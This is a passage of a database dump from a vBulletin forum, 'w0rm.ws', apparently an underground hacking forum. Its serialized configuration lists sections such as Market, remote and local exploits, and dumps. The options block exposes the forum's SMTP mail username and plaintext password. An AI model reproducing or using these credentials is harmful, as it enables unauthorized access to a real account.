s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:15;a:24:{s:7:\"forumid\";i:15;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"source\";s:11:\"title_clean\";s:6:\"source\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:10;s:10:\"lastpostid\";i:3006;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:14;s:10:\"parentlist\";s:8:\"15,14,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"15,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:31;a:24:{s:7:\"forumid\";i:31;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"Market\";s:11:\"title_clean\";s:6:\"Market\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98043;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:9;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:23:\"31,32,35,36,39,37,38,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:4:\"w0rm\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:32;a:24:{s:7:\"forumid\";i:32;s:7:\"styleid\";i:0;s:5:\"title\";s:8:\"services\";s:11:\"title_clean\";s:8:\"services\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:1;s:10:\"lastpostid\";i:2959;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"32,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"32,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:35;a:24:{s:7:\"forumid\";i:35;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"remote\";s:11:\"title_clean\";s:6:\"remote\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:2;s:10:\"lastpostid\";i:2995;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"35,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"35,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:36;a:24:{s:7:\"forumid\";i:36;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"local\";s:11:\"title_clean\";s:5:\"local\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:3;s:10:\"lastpostid\";i:2798;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"36,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"36,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:39;a:24:{s:7:\"forumid\";i:39;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"source\";s:11:\"title_clean\";s:6:\"source\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:4;s:10:\"lastpostid\";i:2927;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"39,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"39,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:37;a:24:{s:7:\"forumid\";i:37;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"dumps\";s:11:\"title_clean\";s:5:\"dumps\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:5;s:10:\"lastpostid\";i:2988;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"37,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"37,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:38;a:24:{s:7:\"forumid\";i:38;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"other\";s:11:\"title_clean\";s:5:\"other\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:6;s:10:\"lastpostid\";i:3005;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"38,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"38,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:17;a:24:{s:7:\"forumid\";i:17;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"other\";s:11:\"title_clean\";s:5:\"other\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:15;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"17,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:11:\"17,24,18,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:0;i:3;i:655375;}}i:24;a:24:{s:7:\"forumid\";i:24;s:7:\"styleid\";i:0;s:5:\"title\";s:10:\"black list\";s:11:\"title_clean\";s:10:\"black list\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:1;s:10:\"lastpostid\";i:3004;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:17;s:10:\"parentlist\";s:8:\"24,17,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"24,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:0;i:3;i:655375;}}i:18;a:24:{s:7:\"forumid\";i:18;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"flame\";s:11:\"title_clean\";s:5:\"flame\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:16;s:10:\"lastpostid\";i:3009;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:17;s:10:\"parentlist\";s:8:\"18,17,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"18,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:0;i:3;i:655375;}}}', 1), ('iconcache', 'a:14:{i:1;a:5:{s:6:\"iconid\";s:1:\"1\";s:5:\"title\";s:4:\"Post\";s:8:\"iconpath\";s:22:\"images/icons/icon1.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:13;a:5:{s:6:\"iconid\";s:2:\"13\";s:5:\"title\";s:11:\"Thumbs down\";s:8:\"iconpath\";s:23:\"images/icons/icon13.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:12;a:5:{s:6:\"iconid\";s:2:\"12\";s:5:\"title\";s:4:\"Wink\";s:8:\"iconpath\";s:23:\"images/icons/icon12.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:11;a:5:{s:6:\"iconid\";s:2:\"11\";s:5:\"title\";s:8:\"Red face\";s:8:\"iconpath\";s:23:\"images/icons/icon11.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:10;a:5:{s:6:\"iconid\";s:2:\"10\";s:5:\"title\";s:7:\"Talking\";s:8:\"iconpath\";s:23:\"images/icons/icon10.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:9;a:5:{s:6:\"iconid\";s:1:\"9\";s:5:\"title\";s:7:\"Unhappy\";s:8:\"iconpath\";s:22:\"images/icons/icon9.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:8;a:5:{s:6:\"iconid\";s:1:\"8\";s:5:\"title\";s:5:\"Angry\";s:8:\"iconpath\";s:22:\"images/icons/icon8.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:7;a:5:{s:6:\"iconid\";s:1:\"7\";s:5:\"title\";s:5:\"Smile\";s:8:\"iconpath\";s:22:\"images/icons/icon7.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:6;a:5:{s:6:\"iconid\";s:1:\"6\";s:5:\"title\";s:4:\"Cool\";s:8:\"iconpath\";s:22:\"images/icons/icon6.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:5;a:5:{s:6:\"iconid\";s:1:\"5\";s:5:\"title\";s:8:\"Question\";s:8:\"iconpath\";s:22:\"images/icons/icon5.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:4;a:5:{s:6:\"iconid\";s:1:\"4\";s:5:\"title\";s:11:\"Exclamation\";s:8:\"iconpath\";s:22:\"images/icons/icon4.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:3;a:5:{s:6:\"iconid\";s:1:\"3\";s:5:\"title\";s:9:\"Lightbulb\";s:8:\"iconpath\";s:22:\"images/icons/icon3.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:2;a:5:{s:6:\"iconid\";s:1:\"2\";s:5:\"title\";s:5:\"Arrow\";s:8:\"iconpath\";s:22:\"images/icons/icon2.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:14;a:5:{s:6:\"iconid\";s:2:\"14\";s:5:\"title\";s:9:\"Thumbs up\";s:8:\"iconpath\";s:23:\"images/icons/icon14.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}}', 1), ('languagecache', 'a:1:{i:1;a:3:{s:10:\"languageid\";s:1:\"1\";s:5:\"title\";s:12:\"English (US)\";s:10:\"userselect\";s:1:\"1\";}}', 1), ('loadcache', 'a:2:{s:7:\"loadavg\";s:5:\"0.10,\";s:9:\"lastcheck\";i:1420392566;}', 1), ('mailqueue', '0', 0), ('maxloggedin', 'a:2:{s:9:\"maxonline\";i:1020;s:13:\"maxonlinedate\";i:1440880876;}', 1), ('noticecache', '', 1), ('options', 'a:402:{s:16:\"activememberdays\";i:30;s:19:\"activememberoptions\";i:3;s:10:\"addheaders\";i:0;s:14:\"addpolltimeout\";i:0;s:7:\"address\";s:0:\"\";s:15:\"addtemplatename\";i:0;s:10:\"adminpower\";i:10;s:15:\"adminquickstats\";i:0;s:18:\"aggressiveemailban\";i:0;s:14:\"albums_perpage\";i:10;s:26:\"albums_pictures_moderation\";i:0;s:23:\"album_captionpreviewlen\";i:150;s:13:\"album_dataloc\";s:2:\"db\";s:21:\"album_maxpicsperalbum\";i:60;s:13:\"album_picpath\";s:0:\"\";s:22:\"album_pictures_perpage\";i:25;s:21:\"album_recentalbumdays\";i:7;s:15:\"album_thumbpath\";s:0:\"\";s:15:\"album_thumbsize\";i:150;s:14:\"album_thumburl\";s:0:\"\";s:18:\"album_uploadamount\";i:3;s:14:\"allowattachdel\";i:1;s:11:\"allowbbcode\";i:1;s:16:\"allowbbimagecode\";i:0;s:17:\"allowchangestyles\";i:1;s:20:\"allowclosedattachdel\";i:0;s:15:\"allowduplicates\";i:1;s:14:\"allowedbbcodes\";i:1023;s:16:\"allowedreferrers\";s:0:\"\";s:9:\"allowhtml\";i:0;s:20:\"allowkeepbannedemail\";i:1;s:14:\"allowmultiregs\";i:0;s:12:\"allowphpinfo\";i:0;s:17:\"allowregistration\";i:0;s:12:\"allowsmilies\";i:1;s:17:\"allowthreadedmode\";i:1;s:14:\"allowwildcards\";i:1;s:14:\"archiveenabled\";i:1;s:20:\"archive_postsperpage\";i:250;s:22:\"archive_threadsperpage\";i:250;s:18:\"archive_threadtype\";i:1;s:14:\"attachboxcount\";i:1;s:10:\"attachfile\";s:0:\"\";s:11:\"attachlimit\";i:5;s:19:\"attachmentviewslive\";i:0;s:10:\"attachpath\";s:34:\"/path/to/your/attachment/directory\";s:12:\"attachresize\";i:1;s:9:\"attachrow\";i:5;s:12:\"attachthumbs\";i:1;s:16:\"attachthumbssize\";i:100;s:16:\"attachtotalspace\";i:0;s:14:\"attachurlcount\";i:1;s:13:\"avatarenabled\";i:1;s:10:\"avatarpath\";s:15:\"./customavatars\";s:9:\"avatarurl\";s:13:\"customavatars\";s:8:\"badwords\";s:0:\"\";s:8:\"banemail\";s:0:\"\";s:5:\"banip\";s:0:\"\";s:8:\"bbactive\";i:0;s:14:\"bbclosedreason\";s:13:\"

Closed

\";s:7:\"bbtitle\";s:7:\"w0rm.ws\";s:5:\"bburl\";s:19:\"https://w0rm.ws:443\";s:15:\"blankasciistrip\";s:31:\"160 173 u8205 u8204 u8237 u8238\";s:11:\"bounceemail\";s:0:\"\";s:11:\"cachemaxage\";i:7;s:10:\"calformat1\";s:6:\"F j, Y\";s:10:\"calformat2\";s:3:\"F j\";s:10:\"censorchar\";s:1:\"*\";s:11:\"censorwords\";s:0:\"\";s:10:\"checkcoppa\";i:0;s:10:\"checknewpm\";i:1;s:11:\"cleargifurl\";s:9:\"clear.gif\";s:12:\"codemaxlines\";i:30;s:11:\"companyname\";s:0:\"\";s:14:\"contactusemail\";s:13:\"forum@w0rm.ws\";s:13:\"contactuslink\";s:15:\"sendmessage.php\";s:16:\"contactusoptions\";s:35:\"Site Feedback\r\nRegistration Problem\";s:14:\"contactusother\";i:0;s:13:\"contactustype\";i:0;s:12:\"cookiedomain\";s:0:\"\";s:10:\"cookiepath\";s:1:\"/\";s:13:\"cookietimeout\";i:900;s:13:\"copypostindex\";i:1;s:13:\"copyrighttext\";s:0:\"\";s:13:\"cpstylefolder\";s:18:\"vBulletin_3_Silver\";s:18:\"cp_collapse_forums\";i:0;s:18:\"cp_usereditcolumns\";i:2;s:11:\"ctCensorMod\";i:1;s:13:\"ctCensorWords\";s:38:\"admin forum moderator vbulletin leader\";s:10:\"ctMaxChars\";i:25;s:10:\"dateformat\";s:5:\"m-d-Y\";s:9:\"datescore\";i:15;s:17:\"defaultregoptions\";i:46629513;s:11:\"description\";s:36:\"w0rm.in * not so public IT community\";s:17:\"disableerroremail\";i:0;s:12:\"disable_ajax\";i:0;s:13:\"displayemails\";i:0;s:15:\"displayloggedin\";i:1;s:8:\"dstonoff\";i:0;s:11:\"editormodes\";s:45:\"a:3:{s:2:\"fe\";i:2;s:2:\"qr\";i:2;s:2:\"qe\";i:2;}\";s:20:\"editthreadtitlelimit\";i:5;s:13:\"edittimelimit\";i:0;s:14:\"emailfloodtime\";i:60;s:12:\"emailsendnum\";i:10;s:12:\"enableaccess\";i:0;s:13:\"enablebanning\";i:1;s:12:\"enablecensor\";i:1;s:11:\"enableemail\";i:0;s:11:\"enablehooks\";i:1;s:16:\"enablememberlist\";i:0;s:9:\"enablepms\";i:1;s:14:\"enablesearches\";i:1;s:13:\"enablespiders\";i:0;s:21:\"enable_inlinemod_auth\";i:1;s:16:\"errorlogdatabase\";s:0:\"\";s:13:\"errorlogemail\";s:0:\"\";s:15:\"errorlogmaxsize\";i:1048576;s:11:\"errorlogphp\";s:0:\"\";s:16:\"errorlogsecurity\";s:0:\"\";s:13:\"externalcache\";i:60;s:13:\"externalcount\";i:15;s:14:\"externalcutoff\";i:30;s:10:\"externaljs\";i:0;s:11:\"externalrss\";i:1;s:11:\"externalxml\";i:0;s:9:\"faxnumber\";s:0:\"\";s:14:\"floodchecktime\";i:30;s:17:\"forumdisplaydepth\";i:2;s:9:\"forumhome\";s:5:\"index\";s:14:\"forumhomedepth\";i:2;s:12:\"forumleaders\";i:0;s:16:\"friends_per_page\";i:10;s:14:\"fulltextsearch\";i:0;s:12:\"globalignore\";s:0:\"\";s:11:\"gm_maxchars\";i:1000;s:13:\"gm_maxperpage\";i:50;s:10:\"gm_perpage\";i:10;s:9:\"goodwords\";s:14:\"vb vbb php sql\";s:13:\"groupiconpath\";s:18:\"./customgroupicons\";s:12:\"groupiconurl\";s:16:\"customgroupicons\";s:9:\"gziplevel\";i:1;s:10:\"gzipoutput\";i:1;s:9:\"hometitle\";s:0:\"\";s:7:\"homeurl\";s:19:\"https://w0rm.ws:443\";s:14:\"hotnumberposts\";i:15;s:14:\"hotnumberviews\";i:150;s:7:\"hvcheck\";i:14;s:23:\"hv_recaptcha_privatekey\";s:0:\"\";s:22:\"hv_recaptcha_publickey\";s:0:\"\";s:18:\"hv_recaptcha_theme\";s:5:\"white\";s:7:\"hv_type\";s:1:\"0\";s:10:\"ie8render7\";i:1;s:10:\"ignoremods\";i:0;s:16:\"ignorequotechars\";i:1;s:16:\"illegalusernames\";s:0:\"\";s:9:\"imagetype\";s:2:\"GD\";s:7:\"ipcheck\";i:1;s:8:\"keywords\";s:12:\"w0rm,w0rm.in\";s:7:\"kppower\";i:100;s:10:\"languageid\";i:1;s:15:\"lastthreadchars\";i:30;s:13:\"legacypostbit\";i:0;s:15:\"lightboxenabled\";i:1;s:11:\"linktopages\";i:1;s:9:\"loadlimit\";i:0;s:13:\"logdateformat\";s:11:\"H:i, jS M Y\";s:5:\"logip\";i:1;s:10:\"magickpath\";s:0:\"\";s:12:\"markinglimit\";i:10;s:9:\"maximages\";i:4;s:12:\"maxmultipage\";i:3;s:13:\"maxpolllength\";i:100;s:14:\"maxpolloptions\";i:10;s:8:\"maxposts\";i:10;s:19:\"maxreputationperday\";i:10;s:10:\"maxresults\";i:500;s:15:\"maxsearchlength\";i:20;s:10:\"maxthreads\";i:20;s:13:\"maxuserlength\";i:25;s:16:\"memberlistfields\";i:0;s:17:\"memberlistperpage\";i:30;s:15:\"memberlistposts\";i:0;s:18:\"minifriends_amount\";i:6;s:18:\"minreputationcount\";i:10;s:17:\"minreputationpost\";i:50;s:15:\"minsearchlength\";i:4;s:13:\"minuserlength\";i:3;s:18:\"moderatenewmembers\";i:0;s:7:\"mqlimit\";i:0;s:15:\"multimatchscore\";i:15;s:10:\"multiquote\";s:1:\"1\";s:13:\"nav_forumdesc\";i:0;s:13:\"needfromemail\";i:0;s:12:\"newuseremail\";s:0:\"\";s:14:\"nocacheheaders\";i:0;s:14:\"noeditedbytime\";i:2;s:17:\"numavatarsperpage\";i:10;s:14:\"numavatarswide\";i:5;s:11:\"oneannounce\";i:1;s:12:\"pagenavpages\";i:3;s:8:\"pagenavs\";s:18:\"10 50 100 500 1000\";s:12:\"paymentemail\";s:0:\"\";s:7:\"pcpower\";i:1000;s:17:\"pc_allowed_bbcode\";i:1091;s:10:\"pc_enabled\";i:1;s:13:\"pc_maxperpage\";i:50;s:13:\"pc_moderation\";i:0;s:10:\"pc_perpage\";i:10;s:11:\"pmfloodtime\";i:60;s:10:\"pmmaxchars\";i:5000;s:12:\"pmmaxperpage\";i:100;s:9:\"pmperpage\";i:50;s:16:\"pmthrottleperiod\";i:0;s:15:\"postedithistory\";i:1;s:12:\"postelements\";i:0;s:14:\"postlog_maxage\";i:7;s:12:\"postmaxchars\";i:10000;s:12:\"postminchars\";i:10;s:14:\"posttitlescore\";i:5;s:10:\"privacyurl\";s:0:\"\";s:15:\"privallowbbcode\";i:1;s:20:\"privallowbbimagecode\";i:1;s:13:\"privallowhtml\";i:0;s:14:\"privallowicons\";i:1;s:16:\"privallowsmilies\";i:1;s:15:\"profilelastpost\";i:0;s:18:\"profilemaxvisitors\";i:10;s:17:\"profilepicenabled\";i:1;s:14:\"profilepicpath\";s:19:\"./customprofilepics\";s:13:\"profilepicurl\";s:17:\"customprofilepics\";s:14:\"profileprivacy\";i:1;s:20:\"profile_album_amount\";i:2;s:9:\"quickedit\";i:1;s:10:\"quickreply\";i:2;s:10:\"quotetitle\";i:0;s:8:\"ratefunc\";s:4:\"none\";s:9:\"ratescore\";d:0.5;s:7:\"rdpower\";i:365;s:14:\"regimageoption\";i:15;s:12:\"regimagetype\";s:0:\"\";s:20:\"registereddateformat\";s:3:\"M Y\";s:9:\"remoteyui\";i:0;s:9:\"replyfunc\";s:4:\"none\";s:10:\"replyscore\";d:0.10000000000000001;s:17:\"reputationdefault\";i:0;s:16:\"reputationenable\";i:1;s:16:\"reputationrepeat\";i:20;s:19:\"reputationundefined\";s:16:\"is off the scale\";s:11:\"reqbirthday\";i:0;s:18:\"requireuniqueemail\";i:1;s:7:\"rpemail\";i:1;s:9:\"rpforumid\";i:0;s:8:\"rpuserid\";s:1:\"0\";s:10:\"rsspodcast\";i:1;s:10:\"safeupload\";i:0;s:15:\"searchfloodtime\";i:0;s:13:\"searchperpage\";i:25;s:13:\"searchsharing\";i:1;s:11:\"secureemail\";i:0;s:14:\"sgd_maxperpage\";i:50;s:11:\"sgd_perpage\";i:10;s:17:\"sg_allowed_bbcode\";i:1091;s:27:\"sg_allow_delete_empty_group\";i:1;s:21:\"sg_allow_join_to_view\";i:0;s:24:\"sg_allow_owner_mod_queue\";i:0;s:22:\"sg_category_cloud_size\";i:40;s:25:\"sg_enablesocialgroupicons\";i:1;s:32:\"sg_enable_owner_only_discussions\";s:1:\"0\";s:22:\"sg_maxdescriptionchars\";i:1000;s:13:\"sg_maxperpage\";i:50;s:16:\"sg_name_maxchars\";i:100;s:18:\"sg_newgroups_count\";i:15;s:10:\"sg_perpage\";i:10;s:13:\"showbirthdays\";i:1;s:11:\"showdeficon\";s:22:\"images/icons/icon1.gif\";s:8:\"showdots\";i:1;s:10:\"showevents\";i:1;s:13:\"showeventtype\";i:0;s:20:\"showforumdescription\";i:1;s:14:\"showforumusers\";i:0;s:12:\"showholidays\";i:1;s:11:\"showimicons\";i:1;s:9:\"showlocks\";i:0;s:19:\"showmoderatorcolumn\";i:0;s:18:\"showprefixlastpost\";i:2;s:17:\"showprivateforums\";s:1:\"0\";s:18:\"showsimilarthreads\";i:1;s:12:\"showstickies\";i:1;s:15:\"showthreadusers\";i:0;s:13:\"showuserrates\";i:5;s:9:\"showvotes\";i:1;s:10:\"sigpicpath\";s:15:\"./signaturepics\";s:9:\"sigpicurl\";s:13:\"signaturepics\";s:19:\"similarthreadsearch\";i:0;s:22:\"similarthreadthreshold\";d:3.5;s:12:\"skypeweb_gfx\";i:1;s:9:\"smcolumns\";i:3;s:7:\"smtotal\";i:15;s:9:\"smtp_host\";s:14:\"smtp.yandex.ru\";s:9:\"smtp_pass\";s:8:\"fb4d56f4\";s:9:\"smtp_port\";i:465;s:8:\"smtp_tls\";s:3:\"ssl\";s:9:\"smtp_user\";s:13:\"forum@w0rm.ws\";s:15:\"socialbookmarks\";i:0;s:17:\"social_moderation\";i:0;s:6:\"socnet\";i:31;s:28:\"socnet_groups_albums_enabled\";i:1;s:25:\"socnet_groups_msg_enabled\";i:1;s:18:\"softlinebreakchars\";i:90;s:12:\"stopshouting\";i:3;s:14:\"storecssasfile\";i:0;s:7:\"styleid\";i:2;s:13:\"subforumdepth\";i:0;s:19:\"subscriptionmethods\";i:0;s:11:\"tagbadwords\";s:0:\"\";s:18:\"tagcloud_cachetime\";i:30;s:15:\"tagcloud_levels\";i:5;s:20:\"tagcloud_searchcloud\";i:1;s:22:\"tagcloud_searchhistory\";i:30;s:13:\"tagcloud_tags\";i:70;s:21:\"tagcloud_usagehistory\";i:365;s:18:\"tagcloud_usergroup\";i:2;s:12:\"tagdelimiter\";s:0:\"\";s:13:\"tagforcelower\";i:1;s:12:\"taggoodwords\";s:0:\"\";s:9:\"tagmaxlen\";i:25;s:13:\"tagmaxstarter\";i:5;s:12:\"tagmaxthread\";i:25;s:10:\"tagmaxuser\";i:2;s:9:\"tagminlen\";i:3;s:15:\"templateversion\";s:5:\"3.8.7\";s:12:\"threadedmode\";i:0;s:18:\"threaded_listdepth\";i:5;s:17:\"threaded_maxcache\";i:40;s:18:\"threaded_trimtitle\";i:30;s:13:\"threadmarking\";s:1:\"0\";s:13:\"threadpreview\";i:150;s:16:\"threadsubscribed\";i:1;s:13:\"threadtagging\";i:1;s:16:\"threadtitlescore\";i:5;s:15:\"threadviewslive\";i:0;s:11:\"threadvoted\";i:0;s:10:\"thumbcolor\";s:7:\"#000000\";s:12:\"thumbquality\";i:75;s:10:\"timeformat\";s:5:\"h:i 